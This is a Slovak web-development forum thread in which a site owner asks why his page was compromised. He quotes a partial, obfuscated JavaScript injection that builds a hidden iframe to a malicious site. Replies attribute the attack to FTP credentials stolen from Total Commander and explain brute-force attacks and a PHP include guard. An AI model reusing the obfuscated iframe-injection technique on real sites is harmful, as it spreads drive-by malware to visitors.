| | |
| Stránka: 1 z 1
| [ Príspevkov: 8 ] | |
Autor | Správa |
---|
Registrovaný: 21.09.08 Prihlásený: 14.11.17 Príspevky: 225 Témy: 74 Bydlisko: Michalovce |
Nazdarek. Chcem sa opytat na par veci.
1. Mam spravenu indexovu stranku, na ktorej nie je vôbec nic, iba nazov stranky..cize ziadny odkaz, ziadny formular..nic. V jednoduchost asi toto:
Kód: <html> <body color: black> <span style=' font-size: 24px; font-weight: bold; font-family: Tahoma, Verdana, Arial; color: green '>www.nazov stranky.sk</span> </body> </html> Nic viac.. Ako je mozne ze mi to hackli...Teda, pri nacitavani mi vypise, ze taha data z nejakej stranky tusim imprerator.ru. A po nacitani sa mi zapne nacitavanie Acrobat Readeru, no skor ako ukonci nacitanie Acrobatu,tak mi vyhodi nejake varovne okienko. Ked som si pozrel zdrojovy kod tej stranky, tak som tam na moje prekvapenie nasiel nieco take: Kód: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>www.nazovstranky.sk</title> <meta http-equiv="content-type" content="text/html; charset=windows-1250" > <meta http-equiv="content-language" content="en" > <meta name="description" content="Only4Web.com" > <meta name="robots" content="all,follow" > </head> <body bottomMargin="0" bgcolor="black" leftMargin="0" topMargin="220" marginheight="0" marginwidth="0" text-align="center"><!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(unescape('')+String.fromCharCode(60)+String.fromCharCode(105)+''+'fr'+unescape('%61%6D')+'e'+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+''+unescape('%3D%22%62')+String.fromCharCode(53)+String.fromCharCode(51)+String.fromCharCode(55)+''+unescape('%65%38%37%66')+unescape('%31%64%62')+'fafe'+unescape('%66%62')+unescape('%38%62%62%37')+...pokracuje to dalej.. Ako to mam osetrit, aby mi to nehackli??? 2. Ako mam osetrit subor, ktory je includovany v index.php?? Mam teraz na mysli subor v ktorom mam ulozene len funkcie s nazvom napr. funkcie.php . V subore index.php ho mam zapisany takto: Kód: require "./funkcie.php";
Je nutne takyto subor vobec nejako este osetrovat proti nejakemu "vniknutiu", alebo je to zbytocne?? Ako to mate osetrene vy??
3. Par krat som sa uz na tomto fore stretol s vyrazom "brute force". S prispevkov som pochopil ze sa jedna o utok na DB, ale zaujimalo by ma to trocha viac. Cize o co presne go a ako sa predtym chranit?? Nevysvetlili by ste mi to niekto alebo hodili by ste mi nejaky link??
Viem ze je tu uz na nieco podobne tema .. myslim to bola : Ochrana PHP skriptov a vy , ale nejako som v tom nenasiel konkretne odpovede na moje otazky.. Mozno tam aj su, len som to asi nepochopil.
|
|
Registrovaný: 09.07.08 Prihlásený: 17.01.15 Príspevky: 1585 Témy: 96 |
načo máš funkcie.php keď php ani nevyužívaš? Či to niekde inde?
Čo heslo? Nemáš náhodou na ftp napríklad meno "user" a heslo "user"?
Inak, odporúčal by som ti zbehnúť aspoň troma antivirákmi comp. Stavím sa, že ti to chcelo naservírovať nejaký exploit pomocou diery v adobe acrobat readeri.
Ten škaredý skript ti vytvorí iframe. Inak divím sa, že to ešte niekto používa takto, toto je trošku zastaralý spôsob by som povedal
// tá tvoja stránka je už nahlásená ako škodlivá Teda ak máš onlyforweb.com.
Okrem toho čo som napísal, snaží sa ešte zmenšiť okno prehliadača na čo najmenšiu veľkosť a robí to každé tri sekundy (300000 v setInterval)
_________________ neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to! |
|
Registrovaný: 26.12.06 Prihlásený: 16.11.19 Príspevky: 3971 Témy: 181 Bydlisko: Nitra / Bra... | Napísal emer: 06.02.2009 22:20 | |
|
toto som mal aj ja... vkladalo mi skodlivy kod do suborov s nazvom index.php, index.html na vsetkych FTP co som mal v totalcommanderi... prebehni pocitac nodom, zmen hesla na ftp a bude to ok
_________________ Sorry za prelkepy |
|
Registrovaný: 21.09.08 Prihlásený: 14.11.17 Príspevky: 225 Témy: 74 Bydlisko: Michalovce |
Dik za odpovede..
rooobertek .. Dik za odpoved, vazim si to, ale fakt si myslis, ze by som pouzival niekde prihlas. meno a heslo rovnake??? Ten subor funkcie.php pouzivam inde
emer ...Presne toto mi to robi..Vklada mi to skodlivy kod do vsetkych index-ovych suborov..
Takze ak som to spravne pochopil, tak nejde o hack, ale skor o virus v mojom PC??
A co dalsie moje otazocky?? Odpoviete mi na nich?? Ako chranit take subory a co je to ta metoda Brute Force??
|
|
Registrovaný: 09.07.08 Prihlásený: 17.01.15 Príspevky: 1585 Témy: 96 |
No podľa emerovej skúsenosti to vyzerá na to, že by si nemal ukladať heslá. Nikdy heslá neukladaj, to sa nevypláca.
Brute force je o tom, že robot skúša rozlúsknuť tvoje heslo. Najjednoduchšie je rozlúsknuť heslá, ktoré sa nachádzajú v slovníku - anglickom, slovenskom alebo inom. Potom sú ľahko rozlúštiteľné krátke heslá. Čím nezmyselnejšie a dlhšie heslo, tým ťažšie sa brute-forcuje Môj rekord bol 34 znakov dlhé heslo skladajúce sa z malých a veľkým písmen, čísel a znakov. Ale to sa tiež ťažko pamätá....
No ale aj tak ti to nepomôže, ak máš v compe nejaký keylogger. To má potom útočník k dispozícii všetko, čo píšeš.
_________________ neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to! |
|
Registrovaný: 21.09.08 Prihlásený: 14.11.17 Príspevky: 225 Témy: 74 Bydlisko: Michalovce |
OK. THX..K tomu keyloggeru..Najde ho aj klasicky antivirak napr. NOD32, alebo na to treba nejaky iny program??
A este k tym samotnym suborom resp. funkcie.php . Treba to nejak zvlast osetrovat a ak ano, tak aka je najlepsia metoda??
|
|
Registrovaný: 09.07.08 Prihlásený: 17.01.15 Príspevky: 1585 Témy: 96 |
Ošetrovať treba, najlepšia metóda je naučiť sa všetko o bezpečnosti a podľa toho robiť kód je toho naozaj veľa, načo treba myslieť
_________________ neříkejte, že něco nejde udělat, protože se vždycky najde nějaký blbec, co neví, že to nejde – a udělá to! |
|
Registrovaný: 07.08.06 Prihlásený: 18.11.21 Príspevky: 947 Témy: 268 Bydlisko: Levice |
prva zasada, na ktoru som aj ja raz doplatil je - nikdy si nenechavaj zapisane heslo v Total Commanderi.... meno si nechaj a heslo si pis pri kazdom spojeni ftp - ak teda pouzivas TC...
ostatne veci - suhlasim s predchodzimi prispevkami.
A pri inkludovani suborov ja pouzivam toto: v subore definujes hned na zaciatku taketo nieco Kód: define('subor', true); a v tom subore, ktory budes includovat das kontrolu na zaciatok Kód: if (!defined('subor')) {die("Nemáte povolený prístup na túto stránku !");}?>
to ti vsak len zaisti, ze includovana stranka bude funkcna jedine v tom subore, kam ho chces inkludovat..
Ostatne sposoby ochrany skus vygooglit....
|
|
| Stránka: 1 z 1
| [ Príspevkov: 8 ] | |
| Nemôžete zakladať nové témy v tomto fóre Nemôžete odpovedať na témy v tomto fóre Nemôžete upravovať svoje príspevky v tomto fóre Nemôžete mazať svoje príspevky v tomto fóre
|
|